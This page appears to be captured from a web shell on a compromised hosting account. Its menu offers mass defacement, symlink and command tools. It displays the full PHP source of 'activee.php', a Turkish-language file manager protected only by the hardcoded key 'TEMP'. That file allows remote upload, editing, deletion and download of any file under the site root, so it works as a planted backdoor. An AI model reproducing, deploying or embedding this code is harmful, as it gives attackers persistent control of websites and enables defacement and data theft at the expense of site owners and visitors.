PHP File Manager Mini

PHP File Manager Mini
Current Dir :/home/azzarreedy/public_html/heshamtarek/[drwxr-xr-x]	Home	Config	Mass Deface
biasa [Writable] home_root [Writable]	Jumping	Symlink	Auto edit user
dir file	Adminer	Command	Logout

FILE EDITOR
Filename :	/home/azzarreedy/public_html/heshamtarek/activee.php
File Size :	13.758 KB
MIME-type :	--
Permission :	rrw-r--r--
Edit	Rename	Chmod	Delete	Download
<?php session_start(); error_reporting(E_ALL); ini_set('display_errors', 1); // Konfigürasyon $adminKey = "TEMP"; // Giriş anahtarı $rootDir = realpath($_SERVER['DOCUMENT_ROOT']); // Erişim sınırı // CSRF Token if (empty($_SESSION['csrf_token'])) { $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); } // Giriş ve Çıkış if (isset($_GET['logout'])) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } if (!isset($_SESSION['logged_in'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['key'] ?? '') === $adminKey) { $_SESSION['logged_in'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } ?> <form method="POST" style="margin:100px auto; max-width:400px; text-align:center;"> <h2>Giriş</h2> <input type="text" name="key" placeholder="Anahtar" required style="padding:10px;"><br><br> <button type="submit" style="padding:10px;">Giriş Yap</button> </form> <?php exit; } // Yol ayarla $path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd(); if (!$path \|\| strpos($path, $rootDir) !== 0) { die("Erişim reddedildi."); } // Yardımcı Fonksiyonlar // ==== Yardımcı Geliştirmeler (cPanel tarzı, Undo ve İndirme) ==== function ensureTrash($rootDir) { $trash = $rootDir . DIRECTORY_SEPARATOR . '.trash'; if (!is_dir($trash)) { @mkdir($trash, 0777, true); } return $trash; }function formatBytes($size, $precision = 2) { $base = log($size, 1024); $suffixes = array('', 'KB', 'MB', 'GB', 'TB'); return $size == 0 ? '0' : round(pow(1024, $base - floor($base)), $precision) . ' ' . $suffixes[floor($base)]; }function rrmdir($dir) { if (!is_dir($dir)) { return; } foreach (array_diff(scandir($dir), ['.','..']) as $f) { $p = $dir . DIRECTORY_SEPARATOR . $f; if (is_dir($p)) { rrmdir($p); } else { @unlink($p); } } @rmdir($dir); }function rcopy($src, $dst) { $dir = opendir($src); @mkdir($dst, 0777, true); while(false !== ($file = readdir($dir))) { if (($file != '.') && ($file != '..')) { $srcPath = $src . DIRECTORY_SEPARATOR . $file; $dstPath = $dst . DIRECTORY_SEPARATOR . $file; if (is_dir($srcPath)) { rcopy($srcPath, $dstPath); } else { copy($srcPath, $dstPath); } } } closedir($dir); }function pushUndo($type, $data) { $_SESSION['last_undo'] = ['type' => $type, 'data' => $data]; }function performUndo() { global $rootDir; if (empty($_SESSION['last_undo'])) { echo "<p>Geri alınacak işlem yok.</p>"; return; } $undo = $_SESSION['last_undo']; $type = $undo['type']; $d = $undo['data']; $ok = false; if ($type === 'rename') { // reverse rename if (file_exists($d['to'])) { $ok = @rename($d['to'], $d['from']); } } elseif ($type === 'delete') { // restore from trash if (!empty($d['trash']) && file_exists($d['trash'])) { $dest = $d['original']; // Ensure parent exists @mkdir(dirname($dest), 0777, true); $ok = @rename($d['trash'], $dest); } } elseif ($type === 'mkdir') { // remove created dir if (is_dir($d['path'])) { rrmdir($d['path']); $ok = true; } } elseif ($type === 'upload' \|\| $type === 'createFile') { // remove created file if (is_file($d['path'])) { @unlink($d['path']); $ok = true; } } elseif ($type === 'edit') { // restore backup content if (!empty($d['backup']) && file_exists($d['backup'])) { // overwrite original if (is_dir(dirname($d['path']))) { $ok = @copy($d['backup'], $d['path']); } } } if ($ok) { echo "<p>Son işlem geri alındı.</p>"; $_SESSION['last_undo'] = null; } else { echo "<p>Geri alma başarısız.</p>"; } }function downloadFile($filePath) { if (!is_file($filePath)) { die("Dosya bulunamadı."); } $name = basename($filePath); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $name . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($filePath)); readfile($filePath); exit; }function listDirectory($path) { $items = array_diff(scandir($path), ['.', '..']); echo "<table style='width:100%; background:#fff; border-collapse:collapse; box-shadow:0 1px 3px rgba(0,0,0,0.08)'>"; echo "<tr style='background:#f0f4f8'><th style='text-align:left;padding:8px'>İsim</th><th>Tip</th><th>Boyut</th><th>Güncellenme</th><th>İşlemler</th></tr>"; foreach ($items as $item) { $itemPath = realpath($path . DIRECTORY_SEPARATOR . $item); if (!$itemPath) continue; $isDir = is_dir($itemPath); $type = $isDir ? "Klasör" : "Dosya"; $size = $isDir ? "-" : (is_file($itemPath) ? formatBytes(filesize($itemPath)) : "-"); $mtime = date("Y-m-d H:i", filemtime($itemPath)); echo "<tr>"; if ($isDir) { echo "<td style='padding:8px'><a href='?path=" . urlencode($itemPath) . "'>📁 $item</a></td>"; } else { echo "<td style='padding:8px'>📄 $item</td>"; } echo "<td style='text-align:center'>$type</td>"; echo "<td style='text-align:center'>$size</td>"; echo "<td style='text-align:center'>$mtime</td>"; echo "<td style='text-align:center'>"; if ($isDir) { echo "<a href='?path=" . urlencode($path) . "&action=rename&item=" . urlencode($item) . "'>Yeniden Adlandır</a> \| "; echo "<a href='?path=" . urlencode($path) . "&action=delete&item=" . urlencode($item) . "' onclick='return confirm(\"Silinsin mi?\")'>Sil</a>"; } else { echo "<a href='?path=" . urlencode($path) . "&action=edit&item=" . urlencode($item) . "'>Düzenle</a> \| "; echo "<a href='?path=" . urlencode($path) . "&action=download&item=" . urlencode($item) . "'>İndir</a> \| "; echo "<a href='?path=" . urlencode($path) . "&action=rename&item=" . urlencode($item) . "'>Yeniden Adlandır</a> \| "; echo "<a href='?path=" . urlencode($path) . "&action=delete&item=" . urlencode($item) . "' onclick='return confirm(\"Silinsin mi?\")'>Sil</a>"; } echo "</td>"; echo "</tr>"; } echo "</table>"; }function editFile($filePath) { if (!file_exists($filePath)) return; if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['csrf_token'] === $_SESSION['csrf_token']) { // Yedek al $root = realpath($_SERVER['DOCUMENT_ROOT']); $trash = ensureTrash($root); $backup = $trash . DIRECTORY_SEPARATOR . uniqid(basename($filePath) . "_backup_", true); @copy($filePath, $backup); if (isset($_POST['content'])) { if (file_put_contents($filePath, $_POST['content']) !== false) { pushUndo('edit', ['path' => $filePath, 'backup' => $backup]); echo "<p>Kaydedildi.</p>"; } else { echo "<p style='color:red;'>Kaydetme hatası.</p>"; } } else { echo "<p style='color:red;'>Boş içerik kaydedilemez.</p>"; } } $content = htmlspecialchars(file_get_contents($filePath)); echo "<form method='POST'> <input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'> <textarea name='content' style='width:100%; height:300px;'>$content</textarea><br> <button type='submit'>Kaydet</button> </form>"; }function renameFile($filePath) { if (!file_exists($filePath)) return; if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['new_name'])) { $newName = basename($_POST['new_name']); $newPath = dirname($filePath) . DIRECTORY_SEPARATOR . $newName; if (!file_exists($newPath)) { if (@rename($filePath, $newPath)) { pushUndo('rename', ['from' => $filePath, 'to' => $newPath]); echo "<p>Yeniden adlandırıldı.</p>"; } else { echo "<p style='color:red;'>Yeniden adlandırma hatası.</p>"; } } else { echo "<p style='color:red;'>Bu isimde dosya/klasör zaten var.</p>"; } } echo "<form method='POST'> <input type='text' name='new_name' placeholder='Yeni ad'><br> <button type='submit'>Yeniden Adlandır</button> </form>"; }function deleteFile($filePath) { if (file_exists($filePath)) { $root = realpath($_SERVER['DOCUMENT_ROOT']); $trash = ensureTrash($root); $trashTarget = $trash . DIRECTORY_SEPARATOR . uniqid(basename($filePath) . "_", true); if (@rename($filePath, $trashTarget)) { pushUndo('delete', ['trash' => $trashTarget, 'original' => $filePath]); echo "<p>Silindi (Çöp kutusuna taşındı).</p>"; } else { echo "<p style='color:red;'>Silme hatası.</p>"; } } else { echo "<p>Dosya bulunamadı.</p>"; } }function uploadFile($path) { if (!empty($_FILES['file']['name'])) { $target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { pushUndo('upload', ['path' => $target]); echo "<p>Yüklendi.</p>"; } else { echo "<p style='color:red;'>Yükleme hatası.</p>"; } } }function createFolder($path) { if (!empty($_POST['folder_name'])) { $folder = $path . DIRECTORY_SEPARATOR . basename($_POST['folder_name']); if (!file_exists($folder)) { if (@mkdir($folder)) { pushUndo('mkdir', ['path' => $folder]); echo "<p>Klasör oluşturuldu.</p>"; } else { echo "<p style='color:red;'>Klasör oluşturulamadı.</p>"; } } else { echo "<p>Klasör zaten var.</p>"; } } }function createFile($path) { if (!empty($_POST['file_name'])) { $file = $path . DIRECTORY_SEPARATOR . basename($_POST['file_name']); if (!file_exists($file)) { if (file_put_contents($file, '') !== false) { pushUndo('createFile', ['path' => $file]); echo "<p>Dosya oluşturuldu.</p>"; } else { echo "<p style='color:red;'>Dosya oluşturulamadı.</p>"; } } else { echo "<p>Dosya zaten var.</p>"; } } } // POST işlemleri if ($_SERVER['REQUEST_METHOD'] === 'POST') { if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) die("CSRF Hatası!"); if (isset($_FILES['file'])) uploadFile($path); if (isset($_POST['folder_name'])) createFolder($path); if (isset($_POST['file_name'])) createFile($path); } // HTML echo "<style> body { font-family: Arial, sans-serif; padding: 20px; background: #f1f5f9; color:#0f172a } input, button { padding: 8px; margin: 5px; } a { text-decoration: none; color: blue; } </style>"; echo "<h2>🗂️ Dosya Yöneticisi</h2>"; echo "<p>Mevcut Dizin: <b>$path</b></p>"; echo "<a href='?path=" . urlencode(dirname($path)) . "'>⬆️ Bir Üst Dizin</a> \| <a href='?logout=1'>🔓 Çıkış Yap</a><hr>"; echo "<div style='display:flex;gap:8px;align-items:center;margin:10px 0'> <a href='?path=" . urlencode(dirname($path)) . "' style='padding:6px 10px; background:#e2e8f0; border-radius:8px'>⬆️ Bir Üst Dizin</a> <a href='?path=" . urlencode($path) . "' style='padding:6px 10px; background:#e2e8f0; border-radius:8px'>🔄 Yenile</a> <a href='?path=" . urlencode($path) . "&undo=1' style='padding:6px 10px; background:#fde68a; border-radius:8px'>↩️ Geri Al</a> <span style='margin-left:auto'></span> <a href='?logout=1' style='padding:6px 10px; background:#fecaca; border-radius:8px'>🔓 Çıkış Yap</a> </div><hr>"; // Eylemler // Geri Al if (isset($_GET['undo']) && $_GET['undo'] == '1') { performUndo(); echo "<hr><a href='?path=" . urlencode($path) . "'>↩️ Geri Dön</a>"; exit; } if (isset($_GET['action'], $_GET['item'])) { $item = basename($_GET['item']); $itemPath = realpath($path . DIRECTORY_SEPARATOR . $item); if (!$itemPath \|\| strpos($itemPath, $rootDir) !== 0) { die("Yetkisiz işlem."); } switch ($_GET['action']) { case 'edit': editFile($itemPath); break; case 'delete': deleteFile($itemPath); break; case 'rename': renameFile($itemPath); break; case 'download': downloadFile($itemPath); break; } echo "<hr><a href='?path=" . urlencode($path) . "'>↩️ Geri Dön</a>"; exit; } // Listele listDirectory($path); // Yükleme / Oluşturma Formları echo "<h3>⬆️ Dosya Yükle</h3> <form method='POST' enctype='multipart/form-data'> <input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'> <input type='file' name='file'><button type='submit'>Yükle</button> </form>"; echo "<h3>📁 Klasör Oluştur</h3> <form method='POST'> <input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'> <input type='text' name='folder_name' placeholder='Klasör Adı'><button type='submit'>Oluştur</button> </form>"; echo "<h3>📄 Dosya Oluştur</h3> <form method='POST'> <input type='hidden' name='csrf_token' value='{$_SESSION['csrf_token']}'> <input type='text' name='file_name' placeholder='Dosya Adı'><button type='submit'>Oluştur</button> </form>"; ?>